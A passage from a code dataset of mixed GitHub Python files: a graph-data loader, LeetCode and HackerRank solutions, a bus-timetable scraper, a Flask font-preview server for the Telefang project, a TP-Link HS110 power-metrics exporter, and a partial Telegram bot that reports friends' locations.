torch.zeros(data.num_nodes).bool()\n test_mask = torch.zeros(data.num_nodes).bool()\n train_mask[idx_splits['train']] = True\n val_mask[idx_splits['valid']] = True\n test_mask[idx_splits['test']] = True\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n data.edge_index = data.adj_t.to_symmetric()\n\n if not use_text:\n return data, None\n\n _process()\n with open(FILE) as f:\n df = pd.read_csv(f)\n df['title'].fillna(\"\", inplace=True)\n df['content'].fillna(\"\", inplace=True)\n text = []\n for ti, ab in zip(df['title'], df['content']):\n t = 'Title: ' + ti.strip() + '\\n' + 'Content: ' + ab.strip()\n text.append(t)\n\n return data, text\n","repo_name":"Charon-ops/GraphLLM","sub_path":"reference_code/TAPE-main/core/data_utils/load_products.py","file_name":"load_products.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11451577790","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n kumar=ListNode(0)\n rum=kumar\n \n car=0\n while l1 or l2 or car:\n v1=l1.val if l1 else 0\n v2=l2.val if l2 else 0\n \n val=v1+v2+car\n car=val//10\n val=val%10\n rum.next=ListNode(val)\n \n rum=rum.next\n l1=l1.next if l1 else None\n l2=l2.next if l2 else None\n \n return kumar.next\n \n \n \n","repo_name":"saadfareed/Leetcode","sub_path":"Python/Add Two Numbers.py","file_name":"Add Two Numbers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"39018323876","text":"#!/usr/bin/python3.5\n\nimport sys\nimport re\nfrom pprint import pprint\n#from operator import itemgetter\n\nwhile True:\n try:\n line = sys.stdin.readline().rstrip()\n\n print(line)\n\n except KeyboardInterrupt:\n break\n\n if not line:\n break\n\n\n","repo_name":"radu/advent","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35308870456","text":"import pandas as pd\r\n\r\nfeatures=['Sepal.Length','Sepal.Width','Petal.Length','Petal.Width']\r\n\r\nvalues=[5.1,3.8,1.6,0.2]\r\n\r\nX_final=pd.DataFrame([values],columns=[features])\r\n\r\nimport joblib\r\n\r\nfilename='flower.sav'\r\n\r\nloaded_model = joblib.load(filename)\r\nresult = loaded_model.predict(X_final)\r\nprint(result)\r\n","repo_name":"Aashishbazzz/Machine-Learning-Web-Appliaction","sub_path":"ML_Wb/IRIS-Flower-classification-master/flower.py","file_name":"flower.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25800955083","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n \"\"\"Function to add two numbers together in a linked list notation\n\n Args:\n l1 (ListNode): Integer number 1 represented as a linked list\n l2 (ListNode): Integer number 2 represented as a linked list\n\n Returns:\n ListNode: the resulting sum returned as a linked list\n \"\"\"\n head = ListNode(0)\n cur = head\n carry = 0\n while l1 or l2 or carry:\n # Set the value, including handling when l1 or l2 is none where we set to 0\n val1 = l1.val if l1 else 0\n val2 = l2.val if l2 else 0\n # Find the value of the two nodes, and determine if there's a carry for next value\n sum_value = val1 + val2 + carry\n carry = sum_value // 10\n sum_value = sum_value % 10\n # Create node and append to the list\n node = ListNode(sum_value)\n # Move to the next ndoe in each list\n l1 = l1.next if l1 else 0\n l2 = l2.next if l2 else 0\n cur.next = node\n cur = node\n return head.next\n","repo_name":"kcc3/leetcode-solutions","sub_path":"problems/python/add_two_numbers.py","file_name":"add_two_numbers.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6115545841","text":"import pandas as pd\nimport sqlite3\n\nfrom utilities.getting_soup_from_web import BSoup\n\ndef user_options():\n '''USER INTERFACE SO THAT IT CAN BE CHOSEN WHAT HE/SHE WANTS TO DO'''\n prompt = '\\nChoose one of the following options:'\n prompt += '\\n --> \"1\" OBTAIN A DATABASE WITH TIMETABLE FOR EVERY LINE'\n prompt += '\\n --> \"2\" OBTAIN A DATABASE WITH BUS_STOPS FOR EVERY LINE'\n prompt += '\\n --> \"3\" OBTAIN A DATABASE WITH BOTH TIMETABLES AND '+ \\\n 'BUS_STOPS FOR EVERY LINE\\n \"q\" to quit\\n'\n active = True\n while active:\n user_choice = input(prompt)\n if user_choice == '1':\n timetables(id_web, num_linea)\n elif user_choice == '2':\n bus_stops(id_web, num_linea)\n elif user_choice == '3':\n timetables(id_web, num_linea)\n bus_stops(id_web, num_linea)\n elif user_choice == 'q':\n break\n else:\n print('You must choose either one of the three options, or quit'+ \\\n '\\nType: \"1\" \"2\" \"3\", or \"q\"')\n active = True\n \ndef soup_timetables(id_, name):\n '''RETRIEVES THE SOUP AFTER SCRAPING THE TIMETABLE WEBPAGE'''\n url_timetables = 'http://transportesrober.com:9055/websae/Transportes'\n url_timetables += '/horario.aspx?id={0}&tipo=L&nombre={1}&fecha=17/02/'\n url_timetables += '2017&desde_horario=si'\n url_timetables = url_timetables.format(id_, name)\n return BSoup(url_timetables).find('div', {'id':'PanelHorario'}) \n\ndef obtain_routes(id_, name):\n '''RETRIEVES THE ROUTES FOR A CERTAIN LINE'''\n soup = soup_timetables(id_, name)\n if (bool(soup)): \n routes = soup.find_all('td', {'class':'tablacabecera'})\n return(routes)\n else:\n lines_not_found.append(name)\n print('Line not found:', lines_not_found)\n\ndef timetables(id_web, line_web_names): \n '''RETRIEVES ALL BUS_TIMETABLE FOR EACH BUS_LINE\n AND POPULATE A DB WITH ITS VALUES'''\n conn_timetables = sqlite3.connect('..\\..\\Data\\Web_crawling_T.Rober\\Trober_data.db')\n\n for id_, name in zip(id_web, line_web_names):\n routes = []\n routes = obtain_routes(id_, name)\n soup = soup_timetables(id_, name)\n\n if (routes):\n for i, route in enumerate(routes):\n timetableDF = pd.DataFrame(\n columns = ['bus_line', 'route', 'timetable'])\n table_name = 'timetable_'\n table_name += '{}'.format(name)+'_'+ \\\n '_'.join(route.text.strip().split())\n table_name = table_name.replace('-', '').replace('__', '_')\n table_name = table_name.replace(' ', '')\n table_timetable = soup.find_all('table')[2+i]\n\n rows = table_timetable.find_all('tr')\n tr_times = []\n for row in rows:\n tr_times.extend(row.text.split(':', 1)[1].split(','))\n\n timetableDF = timetableDF.append(\n pd.DataFrame(\n {'bus_line':name, 'route':table_name,\n 'timetable':tr_times},\n columns=['bus_line', 'route', 'timetable']))\n \n timetableDF.to_sql(table_name, conn_timetables, index=False)\n conn_timetables.commit()\n \n conn_timetables.close()\n \ndef bus_stops(id_web, line_web_names):\n '''RETRIEVES ALL BUS_STOPS FOR EACH BUS_LINE\n AND POPULATE A DB WITH ITS VALUES'''\n conn_bus_stops = sqlite3.connect('..\\..\\Data\\Web_crawling_T.Rober\\Trober_data.db')\n\n for id_, name in zip(id_web, line_web_names):\n url_bus_stops = 'http://transportesrober.com:9055/websae/Transportes/'\n url_bus_stops += 'linea.aspx?idlinea='+str(id_)\n soup = BSoup(url_bus_stops)\n routes = []\n routes = obtain_routes(id_, name)\n if (bool(soup) and bool(routes)):\n for i, route in enumerate(routes):\n busstopsDF = pd.DataFrame(columns = ['busstop', 'transfer'])\n\n table_name = 'busstop_'\n table_name += '{}'.format(name)+'_'+\\\n '_'.join(route.text.strip().split())\n table_name = table_name.replace(\n '-','').replace('__','_').replace(' ', '') \n route = soup.find_all('tr', {'class':'tabla_campo_valor'})\n\n for bus_stop in route:\n bus_stops = bus_stop.find_all('tr')\n bus_stop = bus_stops[0].find('a', {'class':'texto'}).text\n transfers = []\n\n for transfer in bus_stops[2].find_all(\n 'a', {'class':'texto'}): \n transfers.append(transfer.text)\n \n transfers = ' '.join(transfers)\n\n busstopsDF = busstopsDF.append(\n pd.DataFrame(data = [[bus_stop, transfers]],\n columns=['busstop', 'transfer']))\n busstopsDF.to_sql(table_name, conn_bus_stops, index=False)\n conn_bus_stops.commit()\n else: \n lines_not_found.append(name)\n\n conn_bus_stops.close()\n\nweb_codesDF = pd.read_csv('..\\..\\Data\\Web_crawling_T.Rober\\lista_lineas_horarios.csv',\n index_col = 'Unnamed: 0')\nweb_codesDF = web_codesDF.reset_index(drop=True)\nid_web = web_codesDF.id_web.values\nnum_linea = web_codesDF.num_linea.values\n\nlines_not_found = [] \nuser_options()\n","repo_name":"VictorGeaGarcia/TRober","sub_path":"Scripts/CRAWLING/4.Crawl_Bustimetables_and_stops_to_db.py","file_name":"4.Crawl_Bustimetables_and_stops_to_db.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3180425147","text":"from __future__ import unicode_literals\n\nimport csv\nimport os\nimport re\nimport requests\nfrom io import BytesIO, open\nfrom math import ceil\nfrom PIL import Image\n\nfrom flask import Flask, request, Response\n\n# Currently, everything is fairly intertwined with the web app\n# (using `app` here and there, for example), but if needed\n# the preview facilities could be split out into their own module\n# with a little bit of finaglin'.\n\nBACKGROUND_COLOR = (249, 214, 83, 255)\nFOREGROUND_COLOR = ( 55, 55, 55, 255)\n\nDATA_DIR = 'data'\n\nCHARMAP_URL = 'https://raw.githubusercontent.com/telefang/telefang/patch/charmap.asm'\nFONTS = {\n 'normal': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/font.png'\n },\n 'bold': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font_bold.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/bold_font.png'\n },\n 'narrow': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font_narrow.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/narrow_font.png'\n }\n}\n\nCONTROL_CODES = {\n '<bold>': {'font': 'bold'},\n '<normal>': {'font': 'normal'}\n}\n\nREPLACE_CODES = {\n '<&name>': \"Shigeki\"\n}\nREPLACE_CODE_RE = re.compile('|'.join(REPLACE_CODES.keys()))\n\napp = Flask(__name__)\n\n@app.before_first_request\ndef setup():\n try:\n load()\n except IOError:\n update()\n\nclass ArgumentError(Exception):\n def __init__(self, message, *args, **kwargs):\n super(ArgumentError, self).__init__(message, *args, **kwargs)\n self.message = message\n\ndef get_query_arg(name,\n transformer=lambda x: x,\n validator=lambda x: True,\n default=None, required=False, accept_empty=False):\n try:\n arg = request.args[name]\n if not accept_empty and not arg:\n raise KeyError(name)\n except KeyError:\n if required:\n raise ArgumentError(\"Missing required argument: {}\".format(name))\n else:\n return default\n try:\n arg = transformer(arg)\n assert validator(arg)\n except (ValueError, AssertionError):\n raise ArgumentError(\"Argument invalid: {}\".format(name))\n return arg\n\ndef bounds(lowest, highest):\n def is_within_bounds(n):\n return lowest <= n <= highest\n return is_within_bounds\n\ndef one_of(*values):\n def is_among_values(x):\n return x in values\n return is_among_values\n\n@app.route('/preview')\ndef preview():\n try:\n text = get_query_arg('text', required=True, accept_empty=True)\n width = get_query_arg('width', int, bounds(1, 1024), required=True)\n font = get_query_arg('font', str, one_of('normal', 'bold'), default='normal')\n scale = get_query_arg('scale', int, bounds(1, 8), default=2)\n padding = get_query_arg('padding', int, bounds(0, 128), default=0)\n spacing = get_query_arg('spacing', int, bounds(0, 16), default=0)\n page_lines = get_query_arg('lines-per-page', int, bounds(1, 256), default=None)\n prompt_page_lines = get_query_arg('lines-per-prompt', int, bounds(1, 256), default=None)\n min_lines = get_query_arg('minimum-lines', int, bounds(0, 256), default=0)\n except ArgumentError as e:\n return Response(e.message, 400)\n\n image = preview_image(text, width, font, scale, padding,\n spacing, page_lines, prompt_page_lines,\n min_lines)\n png_data = BytesIO()\n image.save(png_data, format='PNG')\n\n return Response(png_data.getvalue(), mimetype='image/png')\n\ndef preview_image(text, width, font='normal',\n scale=1, padding=0,\n spacing=0, page_lines=None, prompt_page_lines=None,\n min_lines=0):\n # No text formatting, since the JavaScript part takes care of that.\n num_lines = text.count('\\n') + 1\n if prompt_page_lines is not None and prompt_page_lines > min_lines:\n min_lines = prompt_page_lines\n if min_lines and num_lines < min_lines:\n text += '\\n' * (min_lines - num_lines)\n num_lines += min_lines - num_lines\n page_lines = num_lines if page_lines is None else page_lines\n \n num_pages = ceil(num_lines / page_lines)\n page_height = 2 * padding + page_lines * 8 + (page_lines - 1) * spacing * 8\n page_spacing = 8\n image = Image.new(\n 'RGBA',\n (\n padding * 2 + width,\n num_pages * (page_height + page_spacing) - page_spacing\n ),\n BACKGROUND_COLOR\n )\n\n text = REPLACE_CODE_RE.sub(lambda m: REPLACE_CODES[m.group()], text)\n\n font_name = font\n font = app.fonts[font_name]\n text_len = len(text)\n i = 0\n line_num = 0\n x = padding\n y = padding\n while i < text_len:\n for char_len in app.descending_char_lengths:\n char = text[i:i + char_len]\n\n try:\n code_effects = CONTROL_CODES[char]\n except LookupError:\n pass\n else:\n font_name = code_effects.get('font', font_name)\n font = app.fonts[font_name]\n i += char_len\n continue\n \n try:\n code = app.charmap[char]\n except LookupError:\n continue\n else:\n break\n else:\n raise ValueError(\"Character not in charset.\")\n \n if char == '\\n':\n x = padding\n y += 8\n line_num += 1\n if prompt_page_lines and line_num % prompt_page_lines == 0:\n image.alpha_composite(app.prompt_continue,\n (image.width - padding - 8, y - 8))\n if line_num % page_lines == 0:\n y += padding\n image.paste((0, 0, 0, 0), (0, y, image.width, y + 8))\n y += 8 + padding\n else:\n y += 8 * spacing\n else:\n glyph_width = font['metrics'][code]\n glyph = font['glyphs'][code]\n if x + 8 > padding + width:\n glyph = glyph.crop((0, 0, max(padding + width - x, 0), 8))\n image.alpha_composite(glyph, (x, y))\n x += glyph_width + 1\n\n i += char_len\n\n if prompt_page_lines:\n image.alpha_composite(\n app.prompt_end,\n (image.width - padding - 8, image.height - padding - 8)\n )\n\n if scale != 1:\n image = image.resize((image.width * scale, image.height * scale))\n\n return image\n\n@app.route('/update', methods=('POST',))\ndef update():\n \"\"\"Update font data from online and save to disk.\"\"\"\n # Split up into three steps to minimize the risk of files being\n # desynced in relation to each other if any part errors out.\n # Prompt tiles aren't updated dynamically at the moment - they're\n # unlikely to change, and it'd just be a pain.\n\n # Fetch resources.\n r = requests.get(CHARMAP_URL)\n raw_charmap = r.text\n\n raw_metric_csvs = []\n for font_name, font_info in FONTS.items():\n r = requests.get(font_info['metrics'])\n filename = 'font_{}.ttfont.csv'.format(font_name)\n raw_metric_csvs.append((filename, r.text))\n\n raw_images = []\n for font_name, font_info in FONTS.items():\n r = requests.get(font_info['image'])\n filename = 'font_{}.png'.format(font_name)\n raw_images.append((filename, r.content))\n \n # Store resources.\n with open(os.path.join(DATA_DIR, 'charmap.asm'), 'w', encoding='utf-8') as f:\n f.write(raw_charmap)\n\n for font_name, csv, image in zip(FONTS.keys(), raw_metric_csvs, raw_images):\n with open(os.path.join(DATA_DIR, csv[0]), 'w', encoding='utf-8') as f:\n f.write(csv[1])\n with open(os.path.join(DATA_DIR, image[0]), 'wb') as f:\n f.write(image[1])\n\n # Put resources into use.\n app.charmap = parse_charmap(raw_charmap)\n app.descending_char_lengths = descending_char_lengths_of(app.charmap, CONTROL_CODES)\n app.fonts = {}\n for font_name, csv, image in zip(FONTS.keys(), raw_metric_csvs, raw_images):\n app.fonts[font_name] = {\n 'metrics': parse_metric_csv(csv[1]),\n 'glyphs': load_glyphs(BytesIO(image[1]))\n }\n \n return Response()\n\ndef load():\n \"\"\"Load font data from disk.\"\"\"\n with open(os.path.join(DATA_DIR, 'charmap.asm'), 'r', encoding='utf-8') as f:\n app.charmap = parse_charmap(f.read())\n app.descending_char_lengths = descending_char_lengths_of(app.charmap, CONTROL_CODES)\n \n app.fonts = {}\n for font_name in FONTS.keys():\n with open(os.path.join(DATA_DIR, 'font_{}.ttfont.csv'.format(font_name)), 'r', encoding='utf-8') as f:\n metrics = parse_metric_csv(f.read())\n with open(os.path.join(DATA_DIR, 'font_{}.png'.format(font_name)), 'rb') as f:\n glyphs = load_glyphs(f)\n app.fonts[font_name] = {\n 'metrics': metrics,\n 'glyphs': glyphs\n }\n \n with open(os.path.join(DATA_DIR, 'prompt_continue.png'), 'rb') as f:\n app.prompt_continue = load_glyphs(f)[0]\n with open(os.path.join(DATA_DIR, 'prompt_end.png'), 'rb') as f:\n app.prompt_end = load_glyphs(f)[0]\n\n# The \"\"\" charmap is actually incorrect RGBDS code, but exists\n# in Telefang's charmap file since it goes through a Python\n# script and never actually through RGBDS.\nCHARMAP_RE = re.compile(r'^(?:charmap \"(?P<char>\"|[^\"]+)\",\\s*(?P<prefix>|\\$|%|&)(?P<code>[0-9A-Fa-f]+))?\\s*(?:;.*)?$')\ndef parse_charmap(s):\n \"\"\"Parse charmap assembly and return a dictionary\n of {character: code} pairs.\n \"\"\"\n charmap = {}\n for line in s.splitlines():\n m = CHARMAP_RE.match(line)\n if not m.group('char'):\n continue\n char = m.group('char')\n if char == '\\\\n':\n char = '\\n'\n code = int(m.group('code'), {'': 10, '$': 16, '%': 2, '&': 8}[m.group('prefix')])\n charmap[char] = code\n return charmap\n\ndef descending_char_lengths_of(*charsets):\n \"\"\"Return a list of the different character lengths\n (e.g. \"x\" has a length of 1; \"<code>\" is 6) in descending order.\n \"\"\"\n lengths = set()\n for charset in charsets:\n for char in charset:\n lengths.add(len(char))\n return sorted(lengths, reverse=True)\n\ndef parse_metric_csv(s):\n \"\"\"Return a list of glyph widths found in the metric CSV data in `s`.\"\"\"\n reader = csv.reader(s.splitlines())\n rows = [row for row in reader]\n rows = rows[1:] # Strip header row.\n rows = [row[1:] for row in rows] # Strip header column.\n widths = [width for row in rows for width in row]\n widths = [int(width[1:], 16) for width in widths]\n return widths\n\ndef load_glyphs(f):\n \"\"\"Return a list of 8×8 glyph images, found in the image file `f`.\"\"\"\n image = Image.open(f)\n image.convert('RGBA')\n data = list(image.getdata())\n for i, (r, g, b, a) in enumerate(data):\n if (r, g, b) == (255, 255, 255):\n data[i] = (r, g, b, 0)\n image.putdata(data)\n\n glyphs = []\n for y in range(0, image.height, 8):\n for x in range(0, image.width, 8):\n glyphs.append(image.crop((x, y, x + 8, y + 8)))\n\n return glyphs\n\nif __name__ == '__main__':\n app.run('localhost', debug=True)\n","repo_name":"telefang/telefang","sub_path":"rip_scripts/sheets/web_preview/preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"4016466212","text":"#!/usr/bin/env python\n\nfrom prometheus_client import start_http_server, Gauge\nimport time\nimport socket\nimport argparse\nimport json\n\nversion = 0.58\n\n# Check if IP is valid\ndef validIP(ip):\n try:\n socket.inet_pton(socket.AF_INET, ip)\n except socket.error:\n parser.error(\"Invalid IP Address.\")\n return ip\n\n# Encryption and Decryption of TP-Link Smart Home Protocol\n# XOR Autokey Cipher with starting key = 171\ndef encrypt(string):\n key = 171\n result = \"\\0\\0\\0\\0\"\n for i in string:\n a = key ^ ord(i)\n key = a\n result += chr(a)\n return result\n\ndef decrypt(string):\n key = 171\n result = \"\"\n for i in string:\n a = key ^ ord(i)\n key = ord(i)\n result += chr(a)\n return result\n\n# Parse commandline arguments\n#parser = argparse.ArgumentParser(description=\"TP-Link Wi-Fi Smart Plug Prometheus exporter v\" + str(version))\n#parser.add_argument(\"-t\", \"--target\", metavar=\"<ip>\", required=True, help=\"Target IP Address\", type=validIP)\n#parser.add_argument(\"-f\", \"--frequency\", metavar=\"<seconds>\", required=False, help=\"Interval in seconds between checking measures\", default=1, type=int)\n#parser.add_argument(\"-p\", \"--port\", metavar=\"<port>\", required=False, help=\"Port for listenin\", default=8110, type=int)\n#args = parser.parse_args()\n\n# Set target IP, port and command to send\nip = \"192.168.1.150\"\nlisten_port = 8110\nsleep_time = 4\nport = 9999\ncmd = '{\"emeter\":{\"get_realtime\":{}}}'\nreceived_data = {\"emeter\":{\"get_realtime\":{\"current\":0.0,\"voltage\":0.0,\"power\":0.0,\"total\":0.0,\"err_code\":0}}}\n\n# Send command and receive reply\n\n# Create a metric to track time spent and requests made.\n# Gaugage: it goes up and down, snapshot of state\n\nREQUEST_POWER = Gauge('hs110_power_watt', 'HS110 Watt measure')\nREQUEST_CURRENT = Gauge('hs110_current', 'HS110 Current measure')\nREQUEST_VOLTAGE = Gauge('hs110_voltage', 'HS110 Voltage measure')\n\n\nREQUEST_POWER.set_function(lambda: get_power() )\nREQUEST_CURRENT.set_function(lambda: get_current() )\nREQUEST_VOLTAGE.set_function(lambda: get_voltage() )\n\ndef get_power():\n \"\"\" Get HS110 power \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"power\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\ndef get_current():\n \"\"\" Get HS110 current \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"current\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\ndef get_voltage():\n \"\"\" Get HS110 voltage \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"voltage\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\n# Main entry point\nif __name__ == '__main__':\n # Start up the server to expose the metrics.\n start_http_server(listen_port)\n a=0\n b=0\n c=0\n\n # Main loop\n while True:\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock_tcp.settimeout(2)\n\n try:\n sock_tcp.connect((ip, port))\n sock_tcp.send(encrypt(cmd))\n data = sock_tcp.recv(2048)\n sock_tcp.close()\n #Sample return value received:\n #{\"emeter\":{\"get_realtime\":{\"current\":1.543330,\"voltage\":235.627293,\"power\":348.994080,\"total\":9.737000,\"err_code\":0}}}\n received_data = json.loads(decrypt(data[4:]))\n #print \"IP: \" + ip + \":\" + str(port) + \" Received power: \" + str(received_data[\"emeter\"][\"get_realtime\"][\"power\"])\n except socket.error:\n #print \"Could not connect to the host \"+ ip + \":\" + str(port)\n a = b + c\n except ValueError:\n received_data = {\"emeter\":{\"get_realtime\":{\"current\":0.0,\"voltage\":0.0,\"power\":0.0,\"total\":0.0,\"err_code\":0}}}\n #print \"Could not decrypt data from hs110.\"\n\n time.sleep(sleep_time)\n\n","repo_name":"KyubiKurama/GadgetSpot","sub_path":"tplink.py","file_name":"tplink.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4633740680","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\n#1\r\nif __name__ == '__main__':\r\n print(\"Hello World !\")\r\n\r\n#2\r\nif __name__ == '__main__':\r\n n = int(raw_input().strip())\r\nif n%2 != 0 :\r\n print(\"Weird\")\r\nif n>=2 and n<=5 :\r\n if n%2 == 0 :\r\n print(\"Not Weird\")\r\n \r\nif n>=6 and n<=20 :\r\n if n%2 == 0 :\r\n print(\"Weird\")\r\nif n>20 :\r\n if n%2 == 0 :\r\n print(\"Not Weird\")\r\n\r\n \r\n#3\r\nif __name__ == '__main__':\r\n a = int(raw_input())\r\n b = int(raw_input())\r\ns = a +b\r\nm = a - b\r\np = a*b \r\nprint(s)\r\nprint(m)\r\nprint(p)\r\n\r\n#4\r\nif __name__ == '__main__':\r\n a = int(raw_input())\r\n b = int(raw_input())\r\n\r\ns = a//b\r\nd =a/b\r\nprint(s)\r\nprint(d)\r\n\r\n#5\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\nfor i in range(0,n) :\r\n a = i*i\r\n print(a)\r\n\r\n#6\r\ndef is_leap(year):\r\n leap = False\r\n \r\n if year%4 == 0 and year%100 != 0 :\r\n leap = True\r\n return leap\r\n elif year%400 == 0 :\r\n leap = True\r\n return leap\r\n elif year%100 == 0 :\r\n leap = False\r\n return leap \r\n else :\r\n return False\r\n\r\n#7\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n\r\nfor i in range(1,n+1) :\r\n print(i,end=\"\")\r\n\r\n\r\n#8\r\nif __name__ == '__main__' :\r\n x, y, z, n = int(input()), int(input()), int(input()), int(input())\r\n print ([[a,b,c] for a in range(0,x+1) for b in range(0,y+1) for c in range(0,z+1) if a + b + c != n ])\r\n \r\n#9\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n lis = list(map(int,raw_input().split()))\r\n print(sorted(list(set(lis)))[-2])\r\n \r\n#10\r\nif __name__ == '__main__' :\r\n grade = []\r\n for _ in range((int(input()))) :\r\n name = raw_input()\r\n score = float(input())\r\n grade.append([name,score])\r\n sort = sorted(list(set([x[1] for x in grade])))\r\n second = sort[1]\r\n final_list = []\r\n for student in grade :\r\n if second == student[1] :\r\n final_list.append(student[0])\r\n for student in sorted(final_list) :\r\n print(student)\r\n \r\n#11\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n student_marks = {}\r\n for _ in range(n):\r\n line = raw_input().split()\r\n name, scores = line[0], line[1:]\r\n scores = map(float, scores)\r\n student_marks[name] = scores\r\n query_name = raw_input()\r\n query_scores = student_marks[query_name]\r\nprint(\"{0:.2f}\".format(sum(query_scores)/(len(query_scores))))\r\n","repo_name":"Rayson-LD/HackerRank-Python-Programs","sub_path":"hackerrank.py","file_name":"hackerrank.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19074986857","text":"#!/usr/bin/env python3\nimport time\nfrom telegram import Update\nfrom os import getenv\nfrom dotenv import load_dotenv, dotenv_values\nfrom telegram.ext import ApplicationBuilder, CommandHandler, ContextTypes, CallbackContext\nfrom wherearethemonkeys.wherearethemonkeys import Locator\nimport sqlite3\n\n\nconn = sqlite3.connect('wherearethemonkeys.db')\n\ncur = conn.cursor()\n\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS users(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n chat_id INTEGER UNIQUE\n )\"\"\")\n\n\ncur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS friends(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n owner_id INTEGER NOT NULL,\n login TEXT NOT NULL\n )\n \"\"\")\nconn.commit()\n#cur.execute(\"INSERT INTO users(chat_id) VALUES(?)\", (int(121)))\n\n\n\n\n\n\n\n\n\ndef give_format(list: dict) -> str:\n location = \"Here are your friends:\\n\"\n for user in list:\n if list[user]:\n location += f\"\"\"• {user} -> {list[user]}\\n\"\"\"\n return location\n\nclass Location:\n def __init__(self):\n self.cursor = conn.cursor()\n self.logins = {}\n self.locator = Locator()\n\nclass DataTimer:\n def __init__(self):\n self.timer = 35 * 60\n self.time_init = time.monotonic()\n self.dead = None\n self.alert = None\n\nclass Bot:\n def __init__(self):\n self.location = Location()\n self.log_out_time = 42 * 60\n self.timer = {}\n self.messages = dotenv_values(\"messages_templates.txt\")\n\n\n\n async def help_panel(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n await update.effective_message.reply_text(self.messages[\"HELP_PANEL\"])\n\n\n def list(self, chat_id):\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n users = \"\"\n if id and id[0]:\n self.location.cursor.execute(\"SELECT login FROM friends WHERE owner_id=?\", (id[0],))\n userslist = self.location.cursor.fetchall()\n for user in userslist:\n users += user[0] + ','\n return users\n\n async def list_show(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n list = self.list(chat_id).split(',')\n userlist = \"\"\n for element in list[:-1]:\n userlist += \"• \" + element + '\\n'\n if userlist == \"\":\n await update.effective_message.reply_text(\"ERROR No friends list\")\n return\n await update.effective_message.reply_text(f\"\"\"Your friends list:\\n{userlist}\"\"\")\n\n\n async def wherearethemonkeys(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n users = self.list(chat_id)\n if not users:\n await update.effective_message.reply_text(\"ERROR No friends list\")\n return\n self.location.locator.set_payload(users_input=users)\n locations = self.location.locator.dict_list()\n await update.effective_message.reply_text(give_format(locations))\n\n\n async def add_monkey(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if not id or not id[0]:\n self.location.cursor.execute(\"INSERT INTO users(chat_id) VALUES(?)\", (chat_id,))\n conn.commit()\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if context.args:\n for userlogin in context.args:\n self.location.cursor.executemany(\"INSERT INTO friends(login, owner_id) VALUES(?, ?)\", [(userlogin, id[0])])\n conn.commit()\n await update.effective_message.reply_text(\"Users added correctly\")\n return\n await update.effective_message.reply_text(\"ERROR Something went wrong\")\n\n async def delete_monkey(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n 